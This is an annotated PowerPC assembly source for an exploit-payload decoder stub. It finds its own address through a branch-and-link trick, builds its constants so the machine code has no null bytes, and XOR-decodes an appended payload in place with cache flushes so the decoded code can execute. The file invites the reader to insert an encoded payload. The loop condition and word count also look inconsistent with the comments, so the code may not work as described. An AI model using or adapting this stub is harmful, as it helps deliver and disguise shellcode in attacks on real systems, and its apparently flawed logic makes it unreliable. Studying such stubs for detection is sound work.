;;;
;;; PowerPC LongXOR Exploit Payload Decoder
;;;
;;; After assembling, place your favorite non-null bytes in the 2nd
;;; byte (reserved bits) of the sync and isync instructions.
;;;
;;; Dino Dai Zovi , 20030821
;;;
;;; -------------------------------------------------------------------
;;; Layout of the stub as written below:
;;;   main    - locate itself via the LR trick, bias r31 so that a
;;;             -1974 displacement reaches the word at `payload`,
;;;             load the XOR key into r6 and the word count into CTR
;;;   Lxorlp  - per word: load, XOR with r6, store back in place, then
;;;             dcbf/sync/icbi/isync so the rewritten word is visible
;;;             to instruction fetch, then advance r31
;;;   payload - start of the XOR-encoded bytes that follow the stub
;;;
;;; Register roles:
;;;   r31 = address of the current payload word + 1974 (every data
;;;         access below uses the -1974(r31) form)
;;;   r5  = -1974; used as the index operand so that r5+r31 is the
;;;         word's real address for dcbf/icbi
;;;   r6  = XOR key 0x99999999
;;;   r4  = word count (moved into CTR), then reused as the data word
;;;   r30 = per-iteration advance, derived from r5
;;;   CR0 = set by `xor.` at entry; read by bnel and bdnzf
;;; Syntax: GAS/PowerPC extended mnemonics, `;` comments. No stack use.
;;;
;;; Analyst note: the per-word dcbf/sync/icbi/isync cache maintenance is
;;; what any self-modifying PowerPC code needs on split I/D caches, and
;;; the sequence is a handy marker when examining stubs of this shape.
;;; -------------------------------------------------------------------
        .globl main
        .globl _main
_main:
main:
;;; PowerPC GetPC() from LSD
        xor. r5, r5, r5                 ; r5 = 0; Rc=1 -> CR0[EQ] set
        bnel main                       ; EQ set -> not taken, but LK=1 still
                                        ; stores LR = address of next insn
        mflr r31                        ; r31 = address of this instruction
        addi r31, r31, 72+1974          ; 72 = distance from main -> payload
                                        ; 1974 is null elliding constant
        subi r5, r5, 1974               ; We need this for the dcbf and icbi
                                        ; (r5 = -1974, cancels the r31 bias)
        lis r6, 0x9999                  ; Xor key = 0x99999999
        ori r6, r6, 0x9999
        li r4, 257+1                    ; 257+
        subi r4, r4, 257                ; split presumably keeps the immediates
                                        ; free of zero bytes, cf. 1974 above
        mtctr r4                        ; CTR = loop count
Lxorlp:
        lwz r4, -1974(r31)              ; r4 = current payload word
        xor r4, r4, r6                  ; decode with key
        stw r4, -1974(r31)              ; write it back in place
;;;
;;; Do the self-modifying code song and dance
;;;
        dcbf r5, r31                    ; Flush data cache block to memory
        sync                            ; Wait for flush to complete
        icbi r5, r31                    ; Invalidate instruction cache block
        isync                           ; Toss prefetched instructions, etc.
        addi r30, r5, -1970             ; Advance r31 to next word
        add r31, r31, r30
        bdnzf eq, Lxorlp                ; CTR--; branch if CTR != 0 and
                                        ; CR0[EQ] is clear (ISA definition)
payload:
;;;
;;; Insert XORed payload here
;;;